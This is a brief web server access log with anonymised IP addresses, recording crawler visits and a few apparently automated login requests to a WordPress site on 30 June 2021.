128.1.248.0 - - [30/Jun/2021:02:38:48 +0200] "GET / HTTP/1.1" 403 2411 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
66.249.75.0 - - [30/Jun/2021:02:40:07 +0200] "GET /robots.txt HTTP/1.1" 301 295 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.0 - - [30/Jun/2021:02:40:09 +0200] "GET /uk/auftraggeber/ HTTP/1.1" 301 301 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.154.0 - - [30/Jun/2021:02:40:51 +0200] "GET / HTTP/1.1" 200 16371 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
157.55.39.0 - - [30/Jun/2021:02:42:29 +0200] "GET /wp-content/uploads/20201204_132103_HDR.jpg HTTP/1.1" 301 329 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
35.193.222.0 - - [30/Jun/2021:02:45:50 +0200] "GET /wp-login.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
35.193.222.0 - - [30/Jun/2021:02:45:51 +0200] "POST /wp-login.php HTTP/1.1" 200 2880 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
35.193.222.0 - - [30/Jun/2021:02:45:53 +0200] "GET /wp-login.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
35.193.222.0 - - [30/Jun/2021:02:45:54 +0200] "POST /wp-login.php HTTP/1.1" 200 2844 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
35.193.222.0 - - [30/Jun/2021:02:45:54 +0200] "POST /xmlrpc.php HTTP/1.1" 200 249 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
114.119.155.0 - - [30/Jun/2021:02:46:26 +0200] "GET /robots.txt HTTP/1.1" 404 2611 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
80.82.77.0 - - [30/Jun/2021:02:49:59 +0200] "GET / HTTP/1.1" 403 2409 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
114.119.139.0 - - [30/Jun/2021:02:50:15 +0200] "GET /ru/unsere-maerkte/ HTTP/1.1" 200 10719 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
